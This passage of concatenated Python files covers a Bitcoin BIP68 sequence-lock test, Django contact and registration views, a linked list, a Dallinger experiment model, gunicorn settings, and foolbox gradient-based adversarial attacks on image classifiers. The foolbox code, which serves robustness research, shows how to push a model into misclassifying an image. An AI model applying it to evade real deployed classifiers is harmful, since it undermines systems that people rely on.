outputs[addresses[i]] = random.randint(1, 20)*0.01
self.nodes[0].sendmany("", outputs)
self.nodes[0].generate(1)
utxos = self.nodes[0].listunspent()
# Try creating a lot of random transactions.
# Each time, choose a random number of inputs, and randomly set
# some of those inputs to be sequence locked (and randomly choose
# between height/time locking). Small random chance of making the locks
# all pass.
for i in range(400):
# Randomly choose up to 10 inputs
num_inputs = random.randint(1, 10)
random.shuffle(utxos)
# Track whether any sequence locks used should fail
should_pass = True
# Track whether this transaction was built with sequence locks
using_sequence_locks = False
tx = CTransaction()
tx.nVersion = 2
value = 0
for j in range(num_inputs):
sequence_value = 0xfffffffe # this disables sequence locks
# 50% chance we enable sequence locks
if random.randint(0,1):
using_sequence_locks = True
# 10% of the time, make the input sequence value pass
input_will_pass = (random.randint(1,10) == 1)
sequence_value = utxos[j]["confirmations"]
if not input_will_pass:
sequence_value += 1
should_pass = False
# Figure out what the median-time-past was for the confirmed input
# Note that if an input has N confirmations, we're going back N blocks
# from the tip so that we're looking up MTP of the block
# PRIOR to the one the input appears in, as per the BIP68 spec.
orig_time = self.get_median_time_past(utxos[j]["confirmations"])
cur_time = self.get_median_time_past(0) # MTP of the tip
# can only timelock this input if it's not too old -- otherwise use height
can_time_lock = True
if ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY) >= SEQUENCE_LOCKTIME_MASK:
can_time_lock = False
# if time-lockable, then 50% chance we make this a time lock
if random.randint(0,1) and can_time_lock:
# Find first time-lock value that fails, or latest one that succeeds
time_delta = sequence_value << SEQUENCE_LOCKTIME_GRANULARITY
if input_will_pass and time_delta > cur_time - orig_time:
sequence_value = ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY)
elif (not input_will_pass and time_delta <= cur_time - orig_time):
sequence_value = ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY)+1
sequence_value |= SEQUENCE_LOCKTIME_TYPE_FLAG
tx.vin.append(CTxIn(COutPoint(int(utxos[j]["txid"], 16), utxos[j]["vout"]), nSequence=sequence_value))
value += utxos[j]["amount"]*COIN
# Overestimate the size of the tx - signatures should be less than 120 bytes, and leave 50 for the output
tx_size = len(ToHex(tx))//2 + 120*num_inputs + 50
tx.vout.append(CTxOut(int(value-self.relayfee*tx_size*COIN/1000), CScript([b'a'])))
rawtx = self.nodes[0].signrawtransactionwithwallet(ToHex(tx))["hex"]
if (using_sequence_locks and not should_pass):
# This transaction should be rejected
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, rawtx)
else:
# This raw transaction should be accepted
self.nodes[0].sendrawtransaction(rawtx)
utxos = self.nodes[0].listunspent()
# Test that sequence locks on unconfirmed inputs must have nSequence
# height or time of 0 to be accepted.
# Then test that BIP68-invalid transactions are removed from the mempool
# after a reorg.
def test_sequence_lock_unconfirmed_inputs(self):
# Store height so we can easily reset the chain at the end of the test
cur_height = self.nodes[0].getblockcount()
# Create a mempool tx.
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 2)
tx1 = FromHex(CTransaction(), self.nodes[0].getrawtransaction(txid))
tx1.rehash()
# Anyone-can-spend mempool tx.
# Sequence lock of 0 should pass.
tx2 = CTransaction()
tx2.nVersion = 2
tx2.vin = [CTxIn(COutPoint(tx1.sha256, 0), nSequence=0)]
tx2.vout = [CTxOut(int(tx1.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
tx2_raw = self.nodes[0].signrawtransactionwithwallet(ToHex(tx2))["hex"]
tx2 = FromHex(tx2, tx2_raw)
tx2.rehash()
self.nodes[0].sendrawtransaction(tx2_raw)
# Create a spend of the 0th output of orig_tx with a sequence lock
# of 1, and test what happens when submitting.
# orig_tx.vout[0] must be an anyone-can-spend output
def test_nonzero_locks(orig_tx, node, relayfee, use_height_lock):
sequence_value = 1
if not use_height_lock:
sequence_value |= SEQUENCE_LOCKTIME_TYPE_FLAG
tx = CTransaction()
tx.nVersion = 2
tx.vin = [CTxIn(COutPoint(orig_tx.sha256, 0), nSequence=sequence_value)]
tx.vout = [CTxOut(int(orig_tx.vout[0].nValue - relayfee * COIN), CScript([b'a' * 35]))]
tx.rehash()
if (orig_tx.hash in node.getrawmempool()):
# sendrawtransaction should fail if the tx is in the mempool
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, node.sendrawtransaction, ToHex(tx))
else:
# sendrawtransaction should succeed if the tx is not in the mempool
node.sendrawtransaction(ToHex(tx))
return tx
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=True)
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
# Now mine some blocks, but make sure tx2 doesn't get mined.
# Use prioritisetransaction to lower the effective feerate to 0
self.nodes[0].prioritisetransaction(txid=tx2.hash, fee_delta=int(-self.relayfee*COIN))
cur_time = int(time.time())
for i in range(10):
self.nodes[0].setmocktime(cur_time + 600)
self.nodes[0].generate(1)
cur_time += 600
assert(tx2.hash in self.nodes[0].getrawmempool())
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=True)
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
# Mine tx2, and then try again
self.nodes[0].prioritisetransaction(txid=tx2.hash, fee_delta=int(self.relayfee*COIN))
# Advance the time on the node so that we can test timelocks
self.nodes[0].setmocktime(cur_time+600)
self.nodes[0].generate(1)
assert(tx2.hash not in self.nodes[0].getrawmempool())
# Now that tx2 is not in the mempool, a sequence locked spend should
# succeed
tx3 = test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
assert(tx3.hash in self.nodes[0].getrawmempool())
self.nodes[0].generate(1)
assert(tx3.hash not in self.nodes[0].getrawmempool())
# One more test, this time using height locks
tx4 = test_nonzero_locks(tx3, self.nodes[0], self.relayfee, use_height_lock=True)
assert(tx4.hash in self.nodes[0].getrawmempool())
# Now try combining confirmed and unconfirmed inputs
tx5 = test_nonzero_locks(tx4, self.nodes[0], self.relayfee, use_height_lock=True)
assert(tx5.hash not in self.nodes[0].getrawmempool())
utxos = self.nodes[0].listunspent()
tx5.vin.append(CTxIn(COutPoint(int(utxos[0]["txid"], 16), utxos[0]["vout"]), nSequence=1))
tx5.vout[0].nValue += int(utxos[0]["amount"]*COIN)
raw_tx5 = self.nodes[0].signrawtransactionwithwallet(ToHex(tx5))["hex"]
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, raw_tx5)
# Test mempool-BIP68 consistency after reorg
#
# State of the transactions in the last blocks:
# ... -> [ tx2 ] -> [ tx3 ]
# tip-1 tip
# And currently tx4 is in the mempool.
#
# If we invalidate the tip, tx3 should get added to the mempool, causing
# tx4 to be removed (fails sequence-lock).
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
assert(tx4.hash not in self.nodes[0].getrawmempool())
assert(tx3.hash in self.nodes[0].getrawmempool())
# Now mine 2 empty blocks to reorg out the current tip (labeled tip-1 in
# diagram above).
# This would cause tx2 to be added back to the mempool, which in turn causes
# tx3 to be removed.
tip = int(self.nodes[0].getblockhash(self.nodes[0].getblockcount()-1), 16)
height = self.nodes[0].getblockcount()
for i in range(2):
block = create_block(tip, create_coinbase(height), cur_time)
block.nVersion = 3
block.rehash()
block.solve()
tip = block.sha256
height += 1
self.nodes[0].submitblock(ToHex(block))
cur_time += 1
mempool = self.nodes[0].getrawmempool()
assert(tx3.hash not in mempool)
assert(tx2.hash in mempool)
# Reset the chain and get rid of the mocktimed-blocks
self.nodes[0].setmocktime(0)
self.nodes[0].invalidateblock(self.nodes[0].getblockhash(cur_height+1))
self.nodes[0].generate(10)
# Make sure that BIP68 isn't being used to validate blocks, prior to
# versionbits activation. If more blocks are mined prior to this test
# being run, then it's possible the test has activated the soft fork, and
# this test should be moved to run earlier, or deleted.
def test_bip68_not_consensus(self):
assert(get_bip9_status(self.nodes[0], 'csv')['status'] != 'active')
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 2)
tx1 = FromHex(CTransaction(), self.nodes[0].getrawtransaction(txid))
tx1.rehash()
# Make an anyone-can-spend transaction
tx2 = CTransaction()
tx2.nVersion = 1
tx2.vin = [CTxIn(COutPoint(tx1.sha256, 0), nSequence=0)]
tx2.vout = [CTxOut(int(tx1.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
# sign tx2
tx2_raw = self.nodes[0].signrawtransactionwithwallet(ToHex(tx2))["hex"]
tx2 = FromHex(tx2, tx2_raw)
tx2.rehash()
self.nodes[0].sendrawtransaction(ToHex(tx2))
# Now make an invalid spend of tx2 according to BIP68
sequence_value = 100 # 100 block relative locktime
tx3 = CTransaction()
tx3.nVersion = 2
tx3.vin = [CTxIn(COutPoint(tx2.sha256, 0), nSequence=sequence_value)]
tx3.vout = [CTxOut(int(tx2.vout[0].nValue - self.relayfee * COIN), CScript([b'a' * 35]))]
tx3.rehash()
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, ToHex(tx3))
# make a block that violates bip68; ensure that the tip updates
tip = int(self.nodes[0].getbestblockhash(), 16)
block = create_block(tip, create_coinbase(self.nodes[0].getblockcount()+1))
block.nVersion = 3
block.vtx.extend([tx1, tx2, tx3])
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
add_witness_commitment(block)
block.solve()
self.nodes[0].submitblock(bytes_to_hex_str(block.serialize(True)))
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
def activateCSV(self):
# activation should happen at block height 432 (3 periods)
# getblockchaininfo will show CSV as active at block 431 (144 * 3 -1) since it's returning whether CSV is active for the next block.
min_activation_height = 432
height = self.nodes[0].getblockcount()
assert_greater_than(min_activation_height - height, 2)
self.nodes[0].generate(min_activation_height - height - 2)
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], "locked_in")
self.nodes[0].generate(1)
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], "active")
sync_blocks(self.nodes)
# Use self.nodes[1] to test that version 2 transactions are standard.
def test_version2_relay(self):
inputs = [ ]
outputs = { self.nodes[1].getnewaddress() : 1.0 }
rawtx = self.nodes[1].createrawtransaction(inputs, outputs)
rawtxfund = self.nodes[1].fundrawtransaction(rawtx)['hex']
tx = FromHex(CTransaction(), rawtxfund)
tx.nVersion = 2
tx_signed = self.nodes[1].signrawtransactionwithwallet(ToHex(tx))["hex"]
self.nodes[1].sendrawtransaction(tx_signed)
if __name__ == '__main__':
BIP68Test().main()
|
py | b40b5cf465a6cd8fddb9edd81c2a4397edccce39 | from __future__ import division
import numpy as np
try:
    from collections.abc import Iterable
except ImportError:  # Python 2 fallback
    from collections import Iterable
import logging
from foolbox.attacks.base import *
class GradientAttack(Attack):
"""Perturbs the image with the gradient of the loss w.r.t. the image,
gradually increasing the magnitude until the image is misclassified.
Does not do anything if the model does not have a gradient.
"""
@call_decorator
def __call__(self, input_or_adv, label=None, unpack=True,
epsilons=1000, max_epsilon=1):
"""Perturbs the image with the gradient of the loss w.r.t. the image,
gradually increasing the magnitude until the image is misclassified.
Parameters
----------
input_or_adv : `numpy.ndarray` or :class:`Adversarial`
The original, unperturbed input as a `numpy.ndarray` or
an :class:`Adversarial` instance.
label : int
The reference label of the original input. Must be passed
if `a` is a `numpy.ndarray`, must not be passed if `a` is
an :class:`Adversarial` instance.
unpack : bool
If true, returns the adversarial input, otherwise returns
the Adversarial object.
epsilons : int or Iterable[float]
Either Iterable of step sizes in the gradient direction
or number of step sizes between 0 and max_epsilon that should
be tried.
max_epsilon : float
Largest step size if epsilons is not an iterable.
"""
a = input_or_adv
del input_or_adv
del label
del unpack
if not a.has_gradient():
return
image = a.original_image
min_, max_ = a.bounds()
gradient = a.gradient()
gradient_norm = np.sqrt(np.mean(np.square(gradient)))
gradient = gradient / (gradient_norm + 1e-8) * (max_ - min_)
if not isinstance(epsilons, Iterable):
epsilons = np.linspace(0, max_epsilon, num=epsilons + 1)[1:]
decrease_if_first = True
else:
decrease_if_first = False
for _ in range(2): # to repeat with decreased epsilons if necessary
for i, epsilon in enumerate(epsilons):
perturbed = image + gradient * epsilon
perturbed = np.clip(perturbed, min_, max_)
_, is_adversarial = a.predictions(perturbed)
if is_adversarial:
if decrease_if_first and i < 20:
logging.info('repeating attack with smaller epsilons')
break
return
max_epsilon = epsilons[i]
epsilons = np.linspace(0, max_epsilon, num=20 + 1)[1:]
class IterativeGradientAttack(Attack):
"""Like GradientAttack but with several steps for each epsilon.
"""
@call_decorator
def __call__(self, input_or_adv, label=None, unpack=True,
epsilons=100, steps=10):
"""Like GradientAttack but with several steps for each epsilon.
Parameters
----------
input_or_adv : `numpy.ndarray` or :class:`Adversarial`
The original, unperturbed input as a `numpy.ndarray` or
an :class:`Adversarial` instance.
label : int
The reference label of the original input. Must be passed
if `a` is a `numpy.ndarray`, must not be passed if `a` is
an :class:`Adversarial` instance.
unpack : bool
If true, returns the adversarial input, otherwise returns
the Adversarial object.
epsilons : int or Iterable[float]
Either Iterable of step sizes in the gradient direction
            or number of step sizes between 0 and 1 / steps that should
            be tried.
        steps : int
            Number of gradient steps to take for each epsilon.
"""
a = input_or_adv
del input_or_adv
del label
del unpack
if not a.has_gradient():
return
image = a.original_image
min_, max_ = a.bounds()
if not isinstance(epsilons, Iterable):
assert isinstance(epsilons, int)
epsilons = np.linspace(0, 1 / steps, num=epsilons + 1)[1:]
for epsilon in epsilons:
perturbed = image
for _ in range(steps):
gradient = a.gradient(perturbed)
gradient_norm = np.sqrt(np.mean(np.square(gradient)))
gradient = gradient / (gradient_norm + 1e-8) * (max_ - min_)
perturbed = perturbed + gradient * epsilon
perturbed = np.clip(perturbed, min_, max_)
a.predictions(perturbed)
# we don't return early if an adversarial was found
# because there might be a different epsilon
# and/or step that results in a better adversarial
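# A minimal usage sketch of the classic foolbox attack API (assumes a wrapped
# foolbox model `fmodel` and a correctly labeled `image`):
#
#   attack = GradientAttack(fmodel)
#   adversarial = attack(image, label=label)
#
#   attack = IterativeGradientAttack(fmodel)
#   adversarial = attack(image, label=label, epsilons=100, steps=10)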
|
py | b40b5d8ad4bc12fd00786f1c1eceaab78a727ab9 | # sendemail/views.py
from django.core.mail import send_mail, BadHeaderError
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render, redirect
from django.core.validators import validate_email
from django.core.exceptions import ValidationError
from .models import ContactsModel
from .forms import ContactsModelForm
from django.urls import reverse
from .forms import CustomUserCreationForm
from django.contrib.auth import login
def validateEmail( email ):
try:
validate_email(email)
return True
except ValidationError:
return False
def contactView(request):
if request.method == 'GET':
form = ContactsModelForm()
elif request.method == 'POST':
form = ContactsModelForm(request.POST)
if form.is_valid():
subject = form.cleaned_data['subject']
from_email = form.cleaned_data['from_email']
            if not validateEmail(from_email):
                return HttpResponse('Invalid sender email address.')
            repeat_email = form.cleaned_data['repeat_email']
            if not validateEmail(repeat_email):
                return HttpResponse('Invalid repeated email address.')
message = form.cleaned_data['message']
u = form.save()
try:
send_mail(subject, message, from_email, ['[email protected]'])
except BadHeaderError:
return HttpResponse('Invalid header found.')
return redirect('success')
    else:
        form = ContactsModelForm()
return render(request, "email.html", {'form': form})
def successView(request):
return HttpResponse('Success! Thank you for your message.')
#Added April 27
def dashboard(request):
return render(request, "dashboard.html")
def register(request):
if request.method == "GET":
return render(
request, "register.html",
{"form": CustomUserCreationForm}
)
elif request.method == "POST":
form = CustomUserCreationForm(request.POST)
        if form.is_valid():
            user = form.save()
            login(request, user)
            return redirect(reverse("dashboard"))
        return render(request, "register.html", {"form": form}) |
py | b40b5db9ef4006aedb65589c680713bfd47b895a |
# Doubly linked List node class
class Node:
def __init__(self, value, nextNode, prevNode):
self.value = value
self.next = nextNode
self.prev = prevNode
# Doubly linked list implementation
class DoublyLinkedList:
def __init__(self):
self.size = 0
self.head = None
self.tail = None
def isEmpty(self):
return self.head is None
def contains(self, value):
if self.isEmpty():
return False
tmp = self.head
while tmp is not None:
if tmp.value == value:
return True
tmp = tmp.next
return False
def get(self, index):
        if index >= self.size or self.isEmpty():
raise IndexError
if index > self.size / 2:
index = (self.size - 1) - index
tmp = self.tail
while index > 0:
tmp = tmp.prev
index -= 1
return tmp.value
else:
tmp = self.head
while index > 0:
tmp = tmp.next
index -= 1
return tmp.value
# Python uses public variables so these aren't really necessary, but they
# are added for code consistency
def getFirst(self):
return self.head
def getLast(self):
return self.tail
def addLast(self, value):
if self.isEmpty():
tmp = Node(value, None, None)
self.head = tmp
self.tail = tmp
self.size += 1
return
tmp = self.tail
tmp.next = Node(value, None, tmp)
self.tail = tmp.next
self.size += 1
def addFirst(self, value):
if self.isEmpty():
tmp = Node(value, None, None)
self.head = tmp
self.tail = tmp
self.size += 1
return
        tmp = self.head
        tmp.prev = Node(value, tmp, None)
        self.head = tmp.prev
self.size += 1
def addAfter(self, key, toAdd):
if self.isEmpty():
raise IndexError
tmp = self.head
while tmp is not None:
if tmp.value == key:
newNode = Node(toAdd, tmp.next, tmp)
tmp.next = newNode
if(newNode.next is not None):
newNode.next.prev = newNode
else:
self.tail = newNode
self.size += 1
return
tmp = tmp.next
raise IndexError
def addBefore(self, key, toAdd):
if self.isEmpty():
raise IndexError
tmp = self.head
while tmp is not None:
if tmp.value == key:
newNode = Node(toAdd, tmp, tmp.prev)
tmp.prev = newNode
if newNode.prev is not None:
newNode.prev.next = newNode
else:
                    self.head = newNode
self.size += 1
return
tmp = tmp.next
raise IndexError
def remove(self, value):
if self.isEmpty():
return
tmp = self.head
while tmp is not None:
if tmp.value == value:
if tmp.prev is not None:
tmp.prev.next = tmp.next
else:
self.head = tmp.next
if tmp.next is not None:
tmp.next.prev = tmp.prev
else:
self.tail = tmp.prev
self.size -= 1
return
tmp = tmp.next
return
def removeFirst(self):
if self.isEmpty():
return
if self.size == 1:
self.head = None
self.tail = None
self.size -= 1
return
self.head = self.head.next
self.head.prev = None
self.size -= 1
def removeLast(self):
if self.isEmpty():
return
if self.size == 1:
self.head = None
self.tail = None
self.size -= 1
return
self.tail = self.tail.prev
self.tail.next = None
self.size -= 1
def indexOf(self, value):
index = 0
tmp = self.head
        while tmp is not None:
if tmp.value == value:
return index
tmp = tmp.next
index += 1
return -1
def clear(self):
self.size = 0
self.head = None
self.tail = None
def __str__(self):
res = "["
tmp = self.head
while tmp is not None:
res += str(tmp.value)
if tmp.next is not None:
res += ", "
tmp = tmp.next
res += "]"
return res
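# A small self-check when this module is run directly (illustrative):
if __name__ == "__main__":
    dll = DoublyLinkedList()
    dll.addLast(1)
    dll.addLast(3)
    dll.addFirst(0)
    dll.addAfter(1, 2)   # list is now [0, 1, 2, 3]
    dll.remove(0)        # list is now [1, 2, 3]
    print(dll, dll.size, dll.indexOf(3))  # -> [1, 2, 3] 3 2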
|
py | b40b5e6cc8014428d43475266ef5f7e4e6af555a | from operator import attrgetter
import random
from sqlalchemy import Float, Integer
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy.sql.expression import cast
from dallinger.models import Transformation
from dallinger.information import Gene, Meme, State
from dallinger.nodes import Agent, Source
class LearningGene(Gene):
"""The Learning Gene."""
__mapper_args__ = {"polymorphic_identity": "learning_gene"}
def _mutated_contents(self):
# Toggle between the two possibilities
if self.contents == "social":
return "asocial"
else:
return "social"
class RogersSource(Source):
"""A source that initializes agents as asocial learners."""
__mapper_args__ = {"polymorphic_identity": "rogers_source"}
def _info_type(self):
"""Create a learning gene by default."""
return LearningGene
def _contents(self):
"""Contents of created Infos is 'asocial' by default."""
return "asocial"
def _what(self):
"""Transmit the first learning gene by default."""
return self.infos(type=LearningGene)[0]
class RogersAgent(Agent):
"""The Rogers Agent."""
__mapper_args__ = {"polymorphic_identity": "rogers_agent"}
@hybrid_property
def generation(self):
"""Convert property2 to genertion."""
return int(self.property2)
@generation.setter
def generation(self, generation):
"""Make generation settable."""
self.property2 = repr(generation)
@generation.expression
def generation(self):
"""Make generation queryable."""
return cast(self.property2, Integer)
@hybrid_property
def score(self):
"""Convert property3 to score."""
return int(self.property3)
@score.setter
def score(self, score):
"""Mark score settable."""
self.property3 = repr(score)
@score.expression
def score(self):
"""Make score queryable."""
return cast(self.property3, Integer)
@hybrid_property
def proportion(self):
"""Make property4 proportion."""
return float(self.property4)
@proportion.setter
def proportion(self, proportion):
"""Make proportion settable."""
self.property4 = repr(proportion)
@proportion.expression
def proportion(self):
"""Make proportion queryable."""
return cast(self.property4, Float)
def calculate_fitness(self):
"""Calculcate your fitness."""
if self.fitness is not None:
raise Exception(
"You are calculating the fitness of agent {}, ".format(self.id)
+ "but they already have a fitness"
)
said_blue = self.infos(type=Meme)[0].contents == "blue"
proportion = float(
max(
self.network.nodes(type=RogersEnvironment)[0].infos(),
key=attrgetter("id"),
).contents
)
self.proportion = proportion
is_blue = proportion > 0.5
if said_blue is is_blue:
self.score = 1
else:
self.score = 0
is_asocial = self.infos(type=LearningGene)[0].contents == "asocial"
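        # Rogers-style payoff: a baseline plus a benefit b for guessing the
        # environment correctly, minus an information cost c paid only by
        # asocial learners, raised to exponent e to sharpen selection.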
e = 2
b = 1
c = 0.3 * b
baseline = c + 0.0001
self.fitness = (baseline + self.score * b - is_asocial * c) ** e
def update(self, infos):
"""Process received infos."""
genes = [i for i in infos if isinstance(i, LearningGene)]
for gene in genes:
if (
self.network.role == "experiment"
and self.generation > 0
and random.random() < 0.10
):
self.mutate(gene)
else:
self.replicate(gene)
def _what(self):
return self.infos(type=LearningGene)[0]
class RogersEnvironment(Source):
"""The Rogers environment."""
__mapper_args__ = {"polymorphic_identity": "rogers_environment"}
@hybrid_property
def proportion(self):
"""Convert property1 to propoertion."""
return float(self.property1)
@proportion.setter
def proportion(self, proportion):
"""Make proportion settable."""
self.property1 = repr(proportion)
@proportion.expression
def proportion(self):
"""Make proportion queryable."""
return cast(self.property1, Float)
def _info_type(self):
"""By default create States."""
return State
def _contents(self):
"""Contents of created infos is either propirtion or 1-proportion by default."""
if random.random() < 0.5:
return self.proportion
else:
return 1 - self.proportion
def _what(self):
"""By default transmit the most recent state """
return max(self.infos(type=State), key=attrgetter("id"))
def step(self):
"""Prompt the environment to change."""
current_state = max(self.infos(type=State), key=attrgetter("id"))
current_contents = float(current_state.contents)
new_contents = 1 - current_contents
info_out = State(origin=self, contents=new_contents)
Transformation(info_in=current_state, info_out=info_out)
|
py | b40b5edd4d2e69167813c0ec47968f8708edfef0 | # -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
import copy
import grp
import inspect
import optparse
import os
import pwd
import textwrap
import types
from gunicorn import __version__
from gunicorn.errors import ConfigError
from gunicorn import util
KNOWN_SETTINGS = []
def wrap_method(func):
def _wrapped(instance, *args, **kwargs):
return func(*args, **kwargs)
return _wrapped
def make_settings(ignore=None):
settings = {}
ignore = ignore or ()
for s in KNOWN_SETTINGS:
setting = s()
if setting.name in ignore:
continue
settings[setting.name] = setting.copy()
return settings
class Config(object):
def __init__(self, usage=None):
self.settings = make_settings()
self.usage = usage
def __getattr__(self, name):
if name not in self.settings:
raise AttributeError("No configuration setting for: %s" % name)
return self.settings[name].get()
def __setattr__(self, name, value):
if name != "settings" and name in self.settings:
raise AttributeError("Invalid access!")
super(Config, self).__setattr__(name, value)
def set(self, name, value):
if name not in self.settings:
raise AttributeError("No configuration setting for: %s" % name)
self.settings[name].set(value)
def parser(self):
kwargs = {
"usage": self.usage,
"version": __version__
}
parser = optparse.OptionParser(**kwargs)
keys = self.settings.keys()
def sorter(k):
return (self.settings[k].section, self.settings[k].order)
keys.sort(key=sorter)
for k in keys:
self.settings[k].add_option(parser)
return parser
@property
def worker_class(self):
uri = self.settings['worker_class'].get()
worker_class = util.load_class(uri)
if hasattr(worker_class, "setup"):
worker_class.setup()
return worker_class
@property
def workers(self):
return self.settings['workers'].get()
@property
def address(self):
bind = self.settings['bind'].get()
return util.parse_address(util.to_bytestring(bind))
@property
def uid(self):
return self.settings['user'].get()
@property
def gid(self):
return self.settings['group'].get()
@property
def proc_name(self):
pn = self.settings['proc_name'].get()
if pn is not None:
return pn
else:
return self.settings['default_proc_name'].get()
@property
def logger_class(self):
uri = self.settings['logger_class'].get()
logger_class = util.load_class(uri, default="simple",
section="gunicorn.loggers")
if hasattr(logger_class, "install"):
logger_class.install()
return logger_class
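# A minimal usage sketch (illustrative, not part of the original module):
#
#   cfg = Config()
#   cfg.set("bind", "0.0.0.0:9000")
#   host, port = cfg.address   # parsed via util.parse_address
#   cfg.workers                # -> 1, the default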
class SettingMeta(type):
def __new__(cls, name, bases, attrs):
super_new = super(SettingMeta, cls).__new__
parents = [b for b in bases if isinstance(b, SettingMeta)]
if not parents:
return super_new(cls, name, bases, attrs)
attrs["order"] = len(KNOWN_SETTINGS)
attrs["validator"] = wrap_method(attrs["validator"])
new_class = super_new(cls, name, bases, attrs)
new_class.fmt_desc(attrs.get("desc", ""))
KNOWN_SETTINGS.append(new_class)
return new_class
def fmt_desc(cls, desc):
desc = textwrap.dedent(desc).strip()
setattr(cls, "desc", desc)
setattr(cls, "short", desc.splitlines()[0])
class Setting(object):
__metaclass__ = SettingMeta
name = None
value = None
section = None
cli = None
validator = None
type = None
meta = None
action = None
default = None
short = None
desc = None
def __init__(self):
if self.default is not None:
self.set(self.default)
def add_option(self, parser):
if not self.cli:
return
args = tuple(self.cli)
kwargs = {
"dest": self.name,
"metavar": self.meta or None,
"action": self.action or "store",
"type": self.type or "string",
"default": None,
"help": "%s [%s]" % (self.short, self.default)
}
if kwargs["action"] != "store":
kwargs.pop("type")
parser.add_option(*args, **kwargs)
def copy(self):
return copy.copy(self)
def get(self):
return self.value
def set(self, val):
assert callable(self.validator), "Invalid validator: %s" % self.name
self.value = self.validator(val)
def validate_bool(val):
if isinstance(val, types.BooleanType):
return val
if not isinstance(val, basestring):
raise TypeError("Invalid type for casting: %s" % val)
if val.lower().strip() == "true":
return True
elif val.lower().strip() == "false":
return False
else:
raise ValueError("Invalid boolean: %s" % val)
def validate_dict(val):
if not isinstance(val, dict):
raise TypeError("Value is not a dictionary: %s " % val)
return val
def validate_pos_int(val):
if not isinstance(val, (types.IntType, types.LongType)):
val = int(val, 0)
else:
# Booleans are ints!
val = int(val)
if val < 0:
raise ValueError("Value must be positive: %s" % val)
return val
def validate_string(val):
if val is None:
return None
if not isinstance(val, basestring):
raise TypeError("Not a string: %s" % val)
return val.strip()
def validate_class(val):
if inspect.isfunction(val) or inspect.ismethod(val):
val = val()
if inspect.isclass(val):
return val
return validate_string(val)
def validate_callable(arity):
def _validate_callable(val):
if not callable(val):
raise TypeError("Value is not callable: %s" % val)
if arity != len(inspect.getargspec(val)[0]):
raise TypeError("Value must have an arity of: %s" % arity)
return val
return _validate_callable
def validate_user(val):
if val is None:
return os.geteuid()
if isinstance(val, int):
return val
elif val.isdigit():
return int(val)
else:
try:
return pwd.getpwnam(val).pw_uid
except KeyError:
raise ConfigError("No such user: '%s'" % val)
def validate_group(val):
if val is None:
return os.getegid()
if isinstance(val, int):
return val
elif val.isdigit():
return int(val)
else:
try:
return grp.getgrnam(val).gr_gid
except KeyError:
raise ConfigError("No such group: '%s'" % val)
def validate_post_request(val):
# decorator
def wrap_post_request(fun):
def _wrapped(instance, req, environ):
return fun(instance, req)
return _wrapped
if not callable(val):
raise TypeError("Value isn't a callable: %s" % val)
largs = len(inspect.getargspec(val)[0])
if largs == 3:
return val
elif largs == 2:
return wrap_post_request(val)
else:
raise TypeError("Value must have an arity of: 3")
class ConfigFile(Setting):
name = "config"
section = "Config File"
cli = ["-c", "--config"]
meta = "FILE"
validator = validate_string
default = None
desc = """\
The path to a Gunicorn config file.
Only has an effect when specified on the command line or as part of an
application specific configuration.
"""
class Bind(Setting):
name = "bind"
section = "Server Socket"
cli = ["-b", "--bind"]
meta = "ADDRESS"
validator = validate_string
default = "127.0.0.1:8000"
desc = """\
The socket to bind.
A string of the form: 'HOST', 'HOST:PORT', 'unix:PATH'. An IP is a valid
HOST.
"""
class Backlog(Setting):
name = "backlog"
section = "Server Socket"
cli = ["--backlog"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 2048
desc = """\
The maximum number of pending connections.
This refers to the number of clients that can be waiting to be served.
Exceeding this number results in the client getting an error when
attempting to connect. It should only affect servers under significant
load.
Must be a positive integer. Generally set in the 64-2048 range.
"""
class Workers(Setting):
name = "workers"
section = "Worker Processes"
cli = ["-w", "--workers"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 1
desc = """\
        The number of worker processes for handling requests.
A positive integer generally in the 2-4 x $(NUM_CORES) range. You'll
want to vary this a bit to find the best for your particular
application's work load.
"""
class WorkerClass(Setting):
name = "worker_class"
section = "Worker Processes"
cli = ["-k", "--worker-class"]
meta = "STRING"
validator = validate_class
default = "sync"
desc = """\
The type of workers to use.
The default class (sync) should handle most 'normal' types of workloads.
You'll want to read http://gunicorn.org/design.html for information on
when you might want to choose one of the other worker classes.
A string referring to one of the following bundled classes:
* ``sync``
* ``eventlet`` - Requires eventlet >= 0.9.7
* ``gevent`` - Requires gevent >= 0.12.2 (?)
* ``tornado`` - Requires tornado >= 0.2
        Optionally, you can provide your own worker by giving Gunicorn a
        Python path to a subclass of ``gunicorn.workers.base.Worker``,
        e.g. ``gunicorn.workers.ggevent.GeventWorker`` to load the gevent
        class. Alternatively, the same class can be loaded through an
        entry point with ``egg:gunicorn#gevent``.
"""
class WorkerConnections(Setting):
name = "worker_connections"
section = "Worker Processes"
cli = ["--worker-connections"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 1000
desc = """\
The maximum number of simultaneous clients.
This setting only affects the Eventlet and Gevent worker types.
"""
class MaxRequests(Setting):
name = "max_requests"
section = "Worker Processes"
cli = ["--max-requests"]
meta = "INT"
validator = validate_pos_int
type = "int"
